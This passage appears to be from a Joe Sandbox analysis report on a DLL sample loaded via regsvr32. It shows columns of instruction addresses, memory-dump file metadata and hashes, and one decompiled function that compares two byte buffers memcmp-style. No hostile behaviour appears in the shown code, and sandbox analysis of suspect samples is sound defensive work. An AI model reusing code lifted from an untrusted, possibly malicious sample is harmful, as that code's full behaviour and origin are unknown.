                                                                                                        0x00000000
                                                                                                        0x1001918c
                                                                                                        0x10019167
                                                                                                        0x1001916b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001916b
                                                                                                        0x100190c8
                                                                                                        0x100190ca
                                                                                                        0x100190e1
                                                                                                        0x100190e9
                                                                                                        0x100190eb
                                                                                                        0x10019102
                                                                                                        0x1001910a
                                                                                                        0x1001910c
                                                                                                        0x10019123
                                                                                                        0x1001912b
                                                                                                        0x1001912d
                                                                                                        0x1001913a
                                                                                                        0x1001913a
                                                                                                        0x00000000
                                                                                                        0x1001912d
                                                                                                        0x10019119
                                                                                                        0x1001911d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001911d
                                                                                                        0x100190f8
                                                                                                        0x100190fc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100190fc
                                                                                                        0x100190d7
                                                                                                        0x100190db
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100190db
                                                                                                        0x10019039
                                                                                                        0x1001903b
                                                                                                        0x10019052
                                                                                                        0x1001905a
                                                                                                        0x1001905c
                                                                                                        0x10019073
                                                                                                        0x1001907b
                                                                                                        0x1001907d
                                                                                                        0x10019094
                                                                                                        0x1001909c
                                                                                                        0x1001909e
                                                                                                        0x100190ab
                                                                                                        0x100190ab
                                                                                                        0x00000000
                                                                                                        0x1001909e
                                                                                                        0x1001908a
                                                                                                        0x1001908e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001908e
                                                                                                        0x10019069
                                                                                                        0x1001906d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001906d
                                                                                                        0x10019048
                                                                                                        0x1001904c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001904c
                                                                                                        0x10018faa
                                                                                                        0x10018fac
                                                                                                        0x10018fc3
                                                                                                        0x10018fcb
                                                                                                        0x10018fcd
                                                                                                        0x10018fe4
                                                                                                        0x10018fec
                                                                                                        0x10018fee
                                                                                                        0x10019005
                                                                                                        0x1001900d
                                                                                                        0x1001900f
                                                                                                        0x1001901c
                                                                                                        0x1001901c
                                                                                                        0x00000000
                                                                                                        0x1001900f
                                                                                                        0x10018ffb
                                                                                                        0x10018fff
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018fff
                                                                                                        0x10018fda
                                                                                                        0x10018fde
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018fde
                                                                                                        0x10018fb9
                                                                                                        0x10018fbd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018fbd
                                                                                                        0x10018f1b
                                                                                                        0x10018f1d
                                                                                                        0x10018f34
                                                                                                        0x10018f3c
                                                                                                        0x10018f3e
                                                                                                        0x10018f55
                                                                                                        0x10018f5d
                                                                                                        0x10018f5f
                                                                                                        0x10018f76
                                                                                                        0x10018f7e
                                                                                                        0x10018f80
                                                                                                        0x10018f8d
                                                                                                        0x10018f8d
                                                                                                        0x00000000
                                                                                                        0x10018f80
                                                                                                        0x10018f6c
                                                                                                        0x10018f70
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018f70
                                                                                                        0x10018f4b
                                                                                                        0x10018f4f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018f4f
                                                                                                        0x10018f2a
                                                                                                        0x10018f2e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018e85
                                                                                                        0x10018e85
                                                                                                        0x10018e88
                                                                                                        0x10018e8c
                                                                                                        0x10018e8e
                                                                                                        0x10018ea5
                                                                                                        0x10018ea5
                                                                                                        0x10018ea9
                                                                                                        0x10018ead
                                                                                                        0x10018eaf
                                                                                                        0x10018ec6
                                                                                                        0x10018ec6
                                                                                                        0x10018eca
                                                                                                        0x10018ece
                                                                                                        0x10018ed0
                                                                                                        0x10018ee7
                                                                                                        0x10018ee7
                                                                                                        0x10018eeb
                                                                                                        0x10018eef
                                                                                                        0x10018ef1
                                                                                                        0x10018ef7
                                                                                                        0x10018efa
                                                                                                        0x10018efe
                                                                                                        0x10018efe
                                                                                                        0x00000000
                                                                                                        0x10018ef1
                                                                                                        0x10018ed6
                                                                                                        0x10018ed9
                                                                                                        0x10018edd
                                                                                                        0x10018ee1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018ee1
                                                                                                        0x10018eb5
                                                                                                        0x10018eb8
                                                                                                        0x10018ebc
                                                                                                        0x10018ec0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018ec0
                                                                                                        0x10018e94
                                                                                                        0x10018e97
                                                                                                        0x10018e9b
                                                                                                        0x10018e9f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018e9f
                                                                                                        0x10018696
                                                                                                        0x10018696
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                        • Instruction ID: 58f509fdb222ca7060b2eae822090135517dfdc7c002ac52267cef539c7c6eb7
                                                                                                        • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                        • Instruction Fuzzy Hash: 07D16073C0AAB30A8376C12D415852EEBE2AFC199531BC7E1DCD43F289D636DE8596D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10018A71(void* __eax, void* __ecx) {
                                                                                                        				void* _t183;
                                                                                                        				signed int _t184;
                                                                                                        				void* _t187;
                                                                                                        				signed char _t193;
                                                                                                        				signed char _t194;
                                                                                                        				signed char _t195;
                                                                                                        				signed char _t196;
                                                                                                        				signed char _t198;
                                                                                                        				signed int _t296;
                                                                                                        				void* _t299;
                                                                                                        				void* _t301;
                                                                                                        				void* _t303;
                                                                                                        				void* _t306;
                                                                                                        				void* _t308;
                                                                                                        				void* _t310;
                                                                                                        				void* _t313;
                                                                                                        				void* _t315;
                                                                                                        				void* _t317;
                                                                                                        				void* _t320;
                                                                                                        				void* _t322;
                                                                                                        				void* _t324;
                                                                                                        				void* _t327;
                                                                                                        				void* _t329;
                                                                                                        				void* _t331;
                                                                                                        				void* _t334;
                                                                                                        				void* _t336;
                                                                                                        				void* _t338;
                                                                                                        
                                                                                                        				_t187 = __ecx;
                                                                                                        				_t183 = __eax;
                                                                                                        				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                                        					_t296 = 0;
                                                                                                        					L12:
                                                                                                        					if(_t296 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t193 =  *(_t183 - 0x19);
                                                                                                        					if(_t193 ==  *(_t187 - 0x19)) {
                                                                                                        						_t296 = 0;
                                                                                                        						L23:
                                                                                                        						if(_t296 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						_t194 =  *(_t183 - 0x15);
                                                                                                        						if(_t194 ==  *(_t187 - 0x15)) {
                                                                                                        							_t296 = 0;
                                                                                                        							L34:
                                                                                                        							if(_t296 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							_t195 =  *(_t183 - 0x11);
                                                                                                        							if(_t195 ==  *(_t187 - 0x11)) {
                                                                                                        								_t296 = 0;
                                                                                                        								L45:
                                                                                                        								if(_t296 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								_t196 =  *(_t183 - 0xd);
                                                                                                        								if(_t196 ==  *(_t187 - 0xd)) {
                                                                                                        									_t296 = 0;
                                                                                                        									L56:
                                                                                                        									if(_t296 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                                        										_t296 = 0;
                                                                                                        										L67:
                                                                                                        										if(_t296 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										_t198 =  *(_t183 - 5);
                                                                                                        										if(_t198 ==  *(_t187 - 5)) {
                                                                                                        											_t296 = 0;
                                                                                                        											L78:
                                                                                                        											if(_t296 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                                        											if(_t184 != 0) {
                                                                                                        												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                                                                                                        											}
                                                                                                        											L2:
                                                                                                        											return _t184;
                                                                                                        										}
                                                                                                        										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                                        										if(_t299 == 0) {
                                                                                                        											L71:
                                                                                                        											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                                        											if(_t301 == 0) {
                                                                                                        												L73:
                                                                                                        												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                                        												if(_t303 == 0) {
                                                                                                        													L75:
                                                                                                        													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                                        													if(_t296 != 0) {
                                                                                                        														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                        													}
                                                                                                        													goto L78;
                                                                                                        												}
                                                                                                        												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                                                                                                        												if(_t296 != 0) {
                                                                                                        													goto L1;
                                                                                                        												}
                                                                                                        												goto L75;
                                                                                                        											}
                                                                                                        											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                                                                                                        											if(_t296 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L73;
                                                                                                        										}
                                                                                                        										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                                                                                                        										if(_t296 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L71;
                                                                                                        									}
                                                                                                        									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                                        									if(_t306 == 0) {
                                                                                                        										L60:
                                                                                                        										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                                        										if(_t308 == 0) {
                                                                                                        											L62:
                                                                                                        											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                                        											if(_t310 == 0) {
                                                                                                        												L64:
                                                                                                        												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                                        												if(_t296 != 0) {
                                                                                                        													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                        												}
                                                                                                        												goto L67;
                                                                                                        											}
                                                                                                        											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                                                                                                        											if(_t296 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L64;
                                                                                                        										}
                                                                                                        										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                                                                                                        										if(_t296 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L62;
                                                                                                        									}
                                                                                                        									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                                                                                                        									if(_t296 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L60;
                                                                                                        								}
                                                                                                        								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                                        								if(_t313 == 0) {
                                                                                                        									L49:
                                                                                                        									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                                        									if(_t315 == 0) {
                                                                                                        										L51:
                                                                                                        										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                                        										if(_t317 == 0) {
                                                                                                        											L53:
                                                                                                        											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                                        											if(_t296 != 0) {
                                                                                                        												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                        											}
                                                                                                        											goto L56;
                                                                                                        										}
                                                                                                        										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                                                                                                        										if(_t296 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L53;
                                                                                                        									}
                                                                                                        									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                                                                                                        									if(_t296 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L51;
                                                                                                        								}
                                                                                                        								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                                                                                                        								if(_t296 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L49;
                                                                                                        							}
                                                                                                        							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                                        							if(_t320 == 0) {
                                                                                                        								L38:
                                                                                                        								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                                        								if(_t322 == 0) {
                                                                                                        									L40:
                                                                                                        									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                                        									if(_t324 == 0) {
                                                                                                        										L42:
                                                                                                        										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                                        										if(_t296 != 0) {
                                                                                                        											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                        										}
                                                                                                        										goto L45;
                                                                                                        									}
                                                                                                        									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                                                                                                        									if(_t296 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L42;
                                                                                                        								}
                                                                                                        								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                                                                                                        								if(_t296 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L40;
                                                                                                        							}
                                                                                                        							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                                                                                                        							if(_t296 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L38;
                                                                                                        						}
                                                                                                        						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                                        						if(_t327 == 0) {
                                                                                                        							L27:
                                                                                                        							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                                        							if(_t329 == 0) {
                                                                                                        								L29:
                                                                                                        								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                                        								if(_t331 == 0) {
                                                                                                        									L31:
                                                                                                        									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                                        									if(_t296 != 0) {
                                                                                                        										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                        									}
                                                                                                        									goto L34;
                                                                                                        								}
                                                                                                        								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                                                                                                        								if(_t296 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L31;
                                                                                                        							}
                                                                                                        							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                                                                                                        							if(_t296 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L29;
                                                                                                        						}
                                                                                                        						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                        						if(_t296 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L27;
                                                                                                        					}
                                                                                                        					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                                        					if(_t334 == 0) {
                                                                                                        						L16:
                                                                                                        						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                                        						if(_t336 == 0) {
                                                                                                        							L18:
                                                                                                        							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                                        							if(_t338 == 0) {
                                                                                                        								L20:
                                                                                                        								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                                        								if(_t296 != 0) {
                                                                                                        									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                        								}
                                                                                                        								goto L23;
                                                                                                        							}
                                                                                                        							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                                                                                                        							if(_t296 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L20;
                                                                                                        						}
                                                                                                        						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                                                                                                        						if(_t296 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L18;
                                                                                                        					}
                                                                                                        					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                        					if(_t296 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L16;
                                                                                                        				} else {
                                                                                                        					__esi = __dl & 0x000000ff;
                                                                                                        					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                        					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                        					if(__esi == 0) {
                                                                                                        						L5:
                                                                                                        						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                        						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                        						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                        						if(__esi == 0) {
                                                                                                        							L7:
                                                                                                        							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                        							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                        							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                        							if(__esi == 0) {
                                                                                                        								L9:
                                                                                                        								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                        								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                        								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                        								if(__esi != 0) {
                                                                                                        									0 = 0 | __esi > 0x00000000;
                                                                                                        									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        								}
                                                                                                        								goto L12;
                                                                                                        							}
                                                                                                        							0 = 0 | __esi > 0x00000000;
                                                                                                        							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        							__esi = __edx;
                                                                                                        							if(__edx != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L9;
                                                                                                        						}
                                                                                                        						0 = 0 | __esi > 0x00000000;
                                                                                                        						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        						__esi = __edx;
                                                                                                        						if(__edx != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        					0 = 0 | __esi > 0x00000000;
                                                                                                        					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        					__esi = __edx;
                                                                                                        					if(__edx != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				_t184 = _t296;
                                                                                                        				goto L2;
                                                                                                        			}






























                                                                                                        0x10018a71
                                                                                                        0x10018a71
                                                                                                        0x10018a77
                                                                                                        0x10018af6
                                                                                                        0x10018af8
                                                                                                        0x10018afa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018b00
                                                                                                        0x10018b06
                                                                                                        0x10018b85
                                                                                                        0x10018b87
                                                                                                        0x10018b89
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018b8f
                                                                                                        0x10018b95
                                                                                                        0x10018c14
                                                                                                        0x10018c16
                                                                                                        0x10018c18
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018c1e
                                                                                                        0x10018c24
                                                                                                        0x10018ca3
                                                                                                        0x10018ca5
                                                                                                        0x10018ca7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018cad
                                                                                                        0x10018cb3
                                                                                                        0x10018d32
                                                                                                        0x10018d34
                                                                                                        0x10018d36
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018d42
                                                                                                        0x10018dc2
                                                                                                        0x10018dc4
                                                                                                        0x10018dc6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018dcc
                                                                                                        0x10018dd2
                                                                                                        0x10018e51
                                                                                                        0x10018e53
                                                                                                        0x10018e55
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018e63
                                                                                                        0x10018e65
                                                                                                        0x10018e76
                                                                                                        0x10018e76
                                                                                                        0x10018a6b
                                                                                                        0x100197c7
                                                                                                        0x100197c7
                                                                                                        0x10018ddb
                                                                                                        0x10018ddd
                                                                                                        0x10018df4
                                                                                                        0x10018dfc
                                                                                                        0x10018dfe
                                                                                                        0x10018e15
                                                                                                        0x10018e1d
                                                                                                        0x10018e1f
                                                                                                        0x10018e36
                                                                                                        0x10018e3e
                                                                                                        0x10018e40
                                                                                                        0x10018e4d
                                                                                                        0x10018e4d
                                                                                                        0x00000000
                                                                                                        0x10018e40
                                                                                                        0x10018e2c
                                                                                                        0x10018e30
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018e30
                                                                                                        0x10018e0b
                                                                                                        0x10018e0f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018e0f
                                                                                                        0x10018dea
                                                                                                        0x10018dee
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018dee
                                                                                                        0x10018d4c
                                                                                                        0x10018d4e
                                                                                                        0x10018d65
                                                                                                        0x10018d6d
                                                                                                        0x10018d6f
                                                                                                        0x10018d86
                                                                                                        0x10018d8e
                                                                                                        0x10018d90
                                                                                                        0x10018da7
                                                                                                        0x10018daf
                                                                                                        0x10018db1
                                                                                                        0x10018dbe
                                                                                                        0x10018dbe
                                                                                                        0x00000000
                                                                                                        0x10018db1
                                                                                                        0x10018d9d
                                                                                                        0x10018da1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018da1
                                                                                                        0x10018d7c
                                                                                                        0x10018d80
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018d80
                                                                                                        0x10018d5b
                                                                                                        0x10018d5f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018d5f
                                                                                                        0x10018cbc
                                                                                                        0x10018cbe
                                                                                                        0x10018cd5
                                                                                                        0x10018cdd
                                                                                                        0x10018cdf
                                                                                                        0x10018cf6
                                                                                                        0x10018cfe
                                                                                                        0x10018d00
                                                                                                        0x10018d17
                                                                                                        0x10018d1f
                                                                                                        0x10018d21
                                                                                                        0x10018d2e
                                                                                                        0x10018d2e
                                                                                                        0x00000000
                                                                                                        0x10018d21
                                                                                                        0x10018d0d
                                                                                                        0x10018d11
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018d11
                                                                                                        0x10018cec
                                                                                                        0x10018cf0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018cf0
                                                                                                        0x10018ccb
                                                                                                        0x10018ccf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018ccf
                                                                                                        0x10018c2d
                                                                                                        0x10018c2f
                                                                                                        0x10018c46
                                                                                                        0x10018c4e
                                                                                                        0x10018c50
                                                                                                        0x10018c67
                                                                                                        0x10018c6f
                                                                                                        0x10018c71
                                                                                                        0x10018c88
                                                                                                        0x10018c90
                                                                                                        0x10018c92
                                                                                                        0x10018c9f
                                                                                                        0x10018c9f
                                                                                                        0x00000000
                                                                                                        0x10018c92
                                                                                                        0x10018c7e
                                                                                                        0x10018c82
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018c82
                                                                                                        0x10018c5d
                                                                                                        0x10018c61
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018c61
                                                                                                        0x10018c3c
                                                                                                        0x10018c40
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018c40
                                                                                                        0x10018b9e
                                                                                                        0x10018ba0
                                                                                                        0x10018bb7
                                                                                                        0x10018bbf
                                                                                                        0x10018bc1
                                                                                                        0x10018bd8
                                                                                                        0x10018be0
                                                                                                        0x10018be2
                                                                                                        0x10018bf9
                                                                                                        0x10018c01
                                                                                                        0x10018c03
                                                                                                        0x10018c10
                                                                                                        0x10018c10
                                                                                                        0x00000000
                                                                                                        0x10018c03
                                                                                                        0x10018bef
                                                                                                        0x10018bf3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018bf3
                                                                                                        0x10018bce
                                                                                                        0x10018bd2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018bd2
                                                                                                        0x10018bad
                                                                                                        0x10018bb1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018bb1
                                                                                                        0x10018b0f
                                                                                                        0x10018b11
                                                                                                        0x10018b28
                                                                                                        0x10018b30
                                                                                                        0x10018b32
                                                                                                        0x10018b49
                                                                                                        0x10018b51
                                                                                                        0x10018b53
                                                                                                        0x10018b6a
                                                                                                        0x10018b72
                                                                                                        0x10018b74
                                                                                                        0x10018b81
                                                                                                        0x10018b81
                                                                                                        0x00000000
                                                                                                        0x10018b74
                                                                                                        0x10018b60
                                                                                                        0x10018b64
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018b64
                                                                                                        0x10018b3f
                                                                                                        0x10018b43
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018b43
                                                                                                        0x10018b1e
                                                                                                        0x10018b22
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018a79
                                                                                                        0x10018a79
                                                                                                        0x10018a7c
                                                                                                        0x10018a80
                                                                                                        0x10018a82
                                                                                                        0x10018a99
                                                                                                        0x10018a99
                                                                                                        0x10018a9d
                                                                                                        0x10018aa1
                                                                                                        0x10018aa3
                                                                                                        0x10018aba
                                                                                                        0x10018aba
                                                                                                        0x10018abe
                                                                                                        0x10018ac2
                                                                                                        0x10018ac4
                                                                                                        0x10018adb
                                                                                                        0x10018adb
                                                                                                        0x10018adf
                                                                                                        0x10018ae3
                                                                                                        0x10018ae5
                                                                                                        0x10018aeb
                                                                                                        0x10018aee
                                                                                                        0x10018af2
                                                                                                        0x10018af2
                                                                                                        0x00000000
                                                                                                        0x10018ae5
                                                                                                        0x10018aca
                                                                                                        0x10018acd
                                                                                                        0x10018ad1
                                                                                                        0x10018ad5
                                                                                                        0x00000000
                                                                                                        0x00000000
